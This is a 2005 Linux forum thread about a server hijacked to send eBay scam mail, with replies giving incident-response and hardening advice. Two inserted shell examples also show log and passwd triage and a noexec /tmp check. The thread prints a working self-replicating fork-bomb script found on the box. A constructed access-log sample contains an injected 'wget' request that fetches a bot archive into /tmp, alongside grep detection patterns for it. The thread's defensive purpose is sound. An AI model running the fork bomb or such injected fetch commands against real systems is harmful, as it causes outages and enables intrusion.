- 06-27-2005 #1 | Just Joined! | Join Date: Jun 2005 | Posts: 8
I've been hacked!
I hope someone could give me some pointers. I found several strange files in the /tmp directory; one of them has the following content, and the name of the file is forkbomb.sh.
I noticed that I was getting so many returned emails and I couldn't figure out why. Evidently these scripts were sending eBay scam emails from my server. Some of the files are owned by apache and some by root. Can someone tell me how they broke into my system, so I can protect myself? I am running a DNS, web, MySQL and sendmail server, and I hope my customer information has not been compromised...
Code:
####################################################################
# Hello,
#
# Welcome to this forkbombing program. This program has the potential
# to even bring the biggest mainframes to its knees.
#
#####################################################################
#
# YOU ARE CRACKED!! THIS PROGRAM WILL KILL YOUR SPAMMING SERVER
# Your server was sending eBay scam mails because of an IRC botnet
# server running in /tmp. It is called sess_<something>; the
# botnet client itself is running in /tmp/sex, and is contained
# in /tmp/sex3.tgz
#####################################################################
#
# shut things down.
#####################################################################
#
sh ./forkbomb.sh &
sh ./forkbomb.sh &
sh ./forkbomb.sh &
sh ./forkbomb.sh &
sh ./forkbomb.sh &
sh ./forkbomb.sh &
sh ./forkbomb.sh &
sh ./forkbomb.sh &
sh ./forkbomb.sh &
sh ./forkbomb.sh &
sh ./forkbomb.sh &
sh ./forkbomb.sh &
sh ./forkbomb.sh &
sh ./forkbomb.sh &
sh ./forkbomb.sh &
I don't mind reinstalling the system; I have backups of all the information, but I would like to know what I was doing wrong. There is another Perl script for which I cannot determine exactly everything that was being done. I don't want to post it here because the code is long, but if someone wants to take a look, please let me know.
I would like to find out to what extent my system was damaged or compromised. Can someone help?
Thank you, guys.
- 06-28-2005 #2
First and most important step: view the /etc/passwd file and look for any suspicious users. Change all your passwords, and (if you have backups) remove users who you think aren't legitimate. Look at your logs; if some of the files are owned by apache, it's most likely the break-in occurred through your web server. Check the logs in /var/logs (or something similar) and generally poke around. Some might be so large that it'll be close to impossible to manually look through them all (like httpd.access), but you should be able to get a general idea of where the break-in occurred.
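The two checks post #2 describes (odd entries in /etc/passwd, and the web-server logs as the likely entry point when files are owned by apache), as an added shell example that is not from the thread or any poster. It assumes a classic /etc/passwd layout and an Apache combined-format access log; both sample files below are constructed, and the "fetch a script into /tmp through a web-application parameter" request pattern it greps for is a common pattern of that era, not something the thread establishes about this particular server.

```shell
#!/bin/sh
# Added triage example, not from the thread. Assumptions: classic /etc/passwd
# layout and an Apache combined-format access log; the remote-file-inclusion
# request pattern is a common one of the period, not a fact about this server.

# Accounts besides root with UID 0, or with an empty password field.
# Usage: find_root_accounts /etc/passwd
find_root_accounts() {
    awk -F: '($3 == 0 && $1 != "root") || $2 == "" { print $1 }' "$1"
}

# Access-log lines where a request parameter points at a remote URL
# (remote file inclusion), or the request mentions wget/curl or /tmp.
# Usage: suspicious_requests /var/log/httpd/access_log
suspicious_requests() {
    grep -E -i '(wget|curl|/tmp|%2ftmp|"(GET|POST) [^"]*=(https?|ftp)://)' "$1"
}

# Files the web-server account dropped under a directory (run as root on the
# real box, e.g. apache_owned_files /tmp). Not exercised on the samples below,
# because file ownership cannot be set without root.
apache_owned_files() {
    find "$1" -user "${2:-apache}" -type f -ls 2>/dev/null
}

# --- constructed samples ----------------------------------------------------
SAMPLE_DIR=$(mktemp -d)
trap 'rm -rf "$SAMPLE_DIR"' EXIT

cat > "$SAMPLE_DIR/passwd" <<'EOF'
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
toor:x:0:0::/:/bin/sh
guest::1001:1001::/home/guest:/bin/sh
alice:x:1000:1000:Alice:/home/alice:/bin/bash
EOF

cat > "$SAMPLE_DIR/access_log" <<'EOF'
10.0.0.5 - - [25/Jun/2005:03:14:07 +0000] "GET /index.php?page=about HTTP/1.1" 200 2310 "http://www.example.com/" "Mozilla/4.0"
192.0.2.44 - - [25/Jun/2005:03:15:22 +0000] "GET /index.php?page=http://203.0.113.9/shell.txt? HTTP/1.0" 200 512 "-" "libwww-perl/5.79"
192.0.2.44 - - [25/Jun/2005:03:15:40 +0000] "GET /index.php?page=http://203.0.113.9/shell.txt?&cmd=cd%20/tmp;wget%20http://203.0.113.9/bot.tgz HTTP/1.0" 200 1024 "-" "libwww-perl/5.79"
10.0.0.7 - - [25/Jun/2005:03:16:01 +0000] "POST /contact.php HTTP/1.1" 302 0 "http://www.example.com/contact.php" "Mozilla/5.0"
EOF

echo "== accounts that are UID 0 (besides root) or have an empty password =="
find_root_accounts "$SAMPLE_DIR/passwd"
echo "== suspicious web requests =="
suspicious_requests "$SAMPLE_DIR/access_log"
```

On the constructed data the first check reports toor and guest, and the second reports only the two libwww-perl requests: the legitimate referer URLs in the other lines do not trigger the remote-URL pattern because it is anchored to the request part of the line. On a real box, point the functions at /etc/passwd and the live access log, and correlate the timestamps of any hits with the modification times of the apache-owned files in /tmp.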
- 06-28-2005 #3 | Just Joined! | Join Date: Jun 2005 | Posts: 8
Thank you
Thank you for responding. I didn't feel comfortable, so I went ahead and reinstalled the system again. I am really going to try to pay more attention to the security issues from now on. Thank you.
- 07-19-2005 #4 | Just Joined! | Join Date: Jul 2005 | Location: Carbondale, IL | Posts: 11
Use logwatch. It goes through the logs and notices stuff like 403s and such from Apache, and other logging software like sendmail, and your disk space. It is a good utility. It emails the root user what it finds suspicious. I love it.
- 07-19-2005 #5 | Linux Guru | Join Date: Nov 2004 | Posts: 6,110
Rootkit Hunter / rkhunter is excellent. At least I think it is; I've never found a rootkit.

I had a few more attempts at my SSH last night. I opened it for half an hour to test it, had a mate connecting, but someone else tried to get me. I've a good mind to post their IP up here......
Nah, I'll resist.
- 07-22-2005 #6 | Just Joined! | Join Date: Jul 2005 | Location: Inside the Kernel (somewhere) | Posts: 41
While rkhunter/rootkithunter/logcheck/chkrootkit are all good, they probably wouldn't have picked this one up. The key here is keeping your public_html software secure, and knowing what it does. In addition, you should (at minimum) have a secure tmp partition, mounted noexec.
You might also check into mod_security and supportive rules.
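The noexec-mounted /tmp that post #6 recommends, as an added shell example that is not from the thread or any poster: it reports which of noexec, nosuid and nodev are missing from the /tmp mount by parsing a /proc/mounts-style listing. The three listings embedded below are constructed, and the /dev/sda3 device in the fstab lines is a hypothetical name.

```shell
#!/bin/sh
# Added example, not from the thread: report which of noexec, nosuid and nodev
# are missing from the /tmp mount. Input is a /proc/mounts-style file
# (device, mountpoint, type, options, dump, pass); the samples below are
# constructed, and /dev/sda3 is a hypothetical device name.
#
# fstab entry for a dedicated /tmp partition, or a tmpfs alternative:
#   /dev/sda3  /tmp  ext3   defaults,noexec,nosuid,nodev  0 0
#   tmpfs      /tmp  tmpfs  defaults,noexec,nosuid,nodev  0 0
# Apply to a running system without a reboot:
#   mount -o remount,noexec,nosuid,nodev /tmp

# Usage: missing_tmp_options MOUNTS_FILE   (e.g. /proc/mounts on a live box)
# Prints each missing option on its own line; prints "no-separate-mount" when
# /tmp is just a directory on another filesystem (so no mount option can
# protect it); prints nothing when all three options are present.
missing_tmp_options() {
    opts=$(awk '$2 == "/tmp" { o = $4 } END { print o }' "$1")
    if [ -z "$opts" ]; then
        echo "no-separate-mount"
        return 0
    fi
    for want in noexec nosuid nodev; do
        case ",$opts," in
            *",$want,"*) ;;            # option present
            *) echo "$want" ;;         # option missing
        esac
    done
}

# --- constructed samples ----------------------------------------------------
MOUNT_SAMPLES=$(mktemp -d)
trap 'rm -rf "$MOUNT_SAMPLES"' EXIT

cat > "$MOUNT_SAMPLES/weak" <<'EOF'
/dev/sda1 / ext3 rw,relatime 0 0
/dev/sda3 /tmp ext3 rw,nosuid 0 0
EOF

cat > "$MOUNT_SAMPLES/hardened" <<'EOF'
/dev/sda1 / ext3 rw,relatime 0 0
/dev/sda3 /tmp ext3 rw,noexec,nosuid,nodev 0 0
EOF

cat > "$MOUNT_SAMPLES/none" <<'EOF'
/dev/sda1 / ext3 rw,relatime 0 0
EOF

for f in weak hardened none; do
    echo "== $f: missing -> $(missing_tmp_options "$MOUNT_SAMPLES/$f" | tr '\n' ' ')"
done
```

One caveat worth keeping in mind: noexec only blocks executing a file directly. Passing it to an interpreter still works, which is exactly what the posted script does with `sh ./forkbomb.sh` and what the Perl script from post #1 would do with `perl /tmp/something.pl`. The mount option raises the bar and breaks the lazy `chmod +x; ./bot` drop, but it does not replace keeping the web application itself patched, which is why post #6 leads with that.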

